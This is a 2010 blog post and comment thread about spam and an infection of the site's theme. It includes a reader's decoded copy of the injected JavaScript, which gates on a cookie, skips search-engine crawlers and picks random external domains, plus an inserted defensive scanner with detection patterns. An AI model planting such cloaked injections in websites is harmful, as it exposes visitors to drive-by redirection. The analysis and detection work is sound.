The Eye of the Fish

Maximus
July 18, 2010

Spamalotnot


We’ve had a couple of comments recently about the site being infected, and have updated things so it should be alright. It’s hard for me to tell if there is anything wrong with the site – it’s not like there is a giant animated green troll that bleurgs its way out of the screen and warns us. But here we are, cleansing away, ready to start blasting the dimensional portal while crossing the proton streams to reverse the particle flow, desplurging the cosmic array and uploading the assorted grunge into the containment grid in the basement…

Anyway – just thought it may be interesting to show you some samples of the over 14,000 spam that have been sent to attack the site, and why we closed comments on older posts, to limit the sheer amount of crap getting through. We were getting up to 50 a day at one stage, and it was getting tedious to check. If you’re sending us a link to another website, do it just one link at a time, or you’ll end up getting crammed with the flammers in the damn spam jammer. Many of you already have your own websites, so will be used to that – occasionally your comments get caught up in the spam-filter, and we have to reach in, delve around inside the slime and muck, and pull your comment back out of the bag. Eeurgh, it’s a messy job, but someone has to do it.

The spam filter performs admirably: none of these shown here ever got through. Fear not. You can relax, as these are no longer live spams, but they have been captured via screengrab, humanely killed, and flash frozen like an alien predator, available only as a jpeg for your viewing pleasure. They can, and will, do you no harm. You can click away: there are no live links. But it is just an example of the mostly boring, mainly offensive, and very occasionally amusing spam that the site gets.

This one here recently caught my fish eye – it almost seemed real, but it is not a service that we really offer. Presumably just another spambot roaming the interwebs, randomly procreating on our website. Sorry ‘fella’ you’ll just have to go elsewhere for that…

Most of the spam are in English, or some variant of it, and very occasionally one in French, German, and even once in Arabic. But while they’re in English, and mostly about viagra or cialis, they mostly seem to come from Russia, while I think this one below came from Poland. Thank heavens then for the great Firewall of China – it keeps their spam in, as well as keeping Google out.

But enough of all that – back to normal transmission shortly !

davidp
18 - 07 - 10

Does someone know what the specific name of the malware that EOT Fish was trying to infect us with was? That’d make it easier to check if people were vulnerable and infected.

Spencer
18 - 07 - 10

I still get a message that “Threat was blocked” and refers to file

eyeofthefish.org/wp-content/themes/eye3/js/jquery.center.js

It might just be a false alarm on my computer (Firefox 3.01 on Vista, using AVG Free 9.0.389) but worth checking out that file, which is a valid file for JQuery, however this is what the start of the proper one looks like
/**
* @author Alexandre Magno
* @desc Center a element with jQuery
* @version 1.0
* @example
* $("element").center({
*
* vertical: true,
* horizontal: true
*
* });
* @obs With no arguments, the default is above
* @license free
* @param bool vertical, bool horizontal
* @contribution Paulo Radichi
*
*/
jQuery.fn.center = function(params) {

and this is the start of what your web server is trying to send me…

var st1 = 0;document.write(unescape(‘%3C%73%63%72%69%70%74%3E%76%61%72%20%64%63%2
….

60 MPa
18 - 07 - 10

Join Linux – we don’t get that shite.

“People say that if you run Microsoft Midori backwards you hear the sound of the Devil. That’s nothing – if you run it forwards it installs Microsoft Midori”

Maximus
19 - 07 - 10

Spencer – thanks for that – hopefully Philip will be able to target that directly.

Philip
20 - 07 - 10

Apologies for the disruption in service over the course of today, hopefully everything nasty should be snuffed out for good now. Please let me know if this is not the case.

Also, in regards to davidp, it’s extremely unlikely to get malware from a website; I wouldn’t worry about it unless you’re running an old operating system (XP or similar) as well as an old browser (version 6 or less of Internet Explorer) and also accidentally clicked/accepted whatever popup/dialog the site was offering. If so, the standard spyware/anti-virus scanning tools should be more than enough.

The old theme will hopefully be restored soon, and I’ll work on upgrading the spam filter….

davidp
20 - 07 - 10

Philip… I keep browser and opsys patched, but I don’t bother with anti-virus software. I doubt I’d be infected by an infected web site, but you never know.

Once unescaped, the dodgy javascript resolved to the following:

var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;dt.setTime(dt.getTime()+9072E4);
document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";
document.write(”)};

I haven’t written programs for years and have no idea what that does. The references to specific web sites make me suspect it is advertising related tho. Anyone?
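
An added example, not part of the original thread or the site's code: a way to check theme files for the `document.write(unescape('%3C%73…'))` wrapper Spencer quoted and turn the payload back into text without running it, then note the gating checks visible in the decoded script (cookie test, crawler user-agent filter, platform test). The names `scanSource` and `decodeEscaped` and the sample input are assumptions made for illustration.

```javascript
// Added example: statically decode document.write(unescape('%XX...')) wrappers.
// Nothing is eval'd; the payload is only converted back to text for review.
const QUOTES = `'"‘’“”`; // straight plus typographic quotes from pasted copies
const WRAPPER = new RegExp(
  `unescape\\(\\s*[${QUOTES}]((?:%[0-9A-Fa-f]{2}|[^${QUOTES}%])*)`, "g");

function decodeEscaped(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

function scanSource(file, src) {
  const findings = [];
  for (const m of src.matchAll(WRAPPER)) {
    const encoded = m[1];
    const pct = (encoded.match(/%[0-9A-Fa-f]{2}/g) || []).length;
    // Ordinary code escapes a character or two; a string that is almost
    // entirely %XX is hiding plain ASCII. Truncated captures still match.
    if (pct < 8 || pct * 3 < encoded.length * 0.8) continue;
    const decoded = decodeEscaped(encoded);
    findings.push({
      file,
      offset: m.index,
      decoded,
      traits: {
        writesMarkup: /<(script|iframe)/i.test(decoded),
        cookieGate: /document\.cookie/.test(decoded),
        crawlerFilter: /googlebot|msnbot|yandex/i.test(decoded),
        platformCheck: /appVersion|platform/.test(decoded),
      },
    });
  }
  return findings;
}

// Constructed sample: a harmless stand-in script, percent-encoded the same way.
const inner = '<script>var a=navigator.userAgent,c=navigator.appVersion;' +
  'if(document.cookie.indexOf("watchtime")==-1&&!/googlebot/i.test(a)){}</script>';
const SAMPLE = "var st1 = 0;document.write(unescape('" +
  Array.from(inner, ch => "%" + ch.charCodeAt(0).toString(16).toUpperCase()
    .padStart(2, "0")).join("") + "'));";

for (const f of scanSource("jquery.center.js", SAMPLE)) {
  console.log(f.file, "offset", f.offset, f.traits, f.decoded.slice(0, 40));
}
```

Run over a copy of the theme's `js` directory, any finding in a file that should be a stock library is a reason to compare that file against the upstream release.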

starkive
22 - 07 - 10

You OK under there?

maximus
22 - 07 - 10

Yes thanks, we’re ok ! Hopefully, spam and virus all gone ?
How was your holiday in Sydney ?

starkive
22 - 07 - 10

Seen via Safari on a Mac, the site seems to have been gill netted and gaffed. Most of it is missing and the rest is strangely whited-out. I had no problems with the original virus scare, but things look pretty fishy to me now…

Although to be fair we seem to have got a one-click comments count back.

Maximus
23 - 07 - 10

No, starkive, the whited out look (like the soft stomach flesh of a white bellied lemon shark) is just another ‘theme’ on the blogging software, while Philip takes the original one back to the basement and beats the heck out of it till it behaves itself.

I think (and hope) that we (he) will have another (or the same one, revamped), back, soon.

And I’ll get back to posting soon (ish). I think.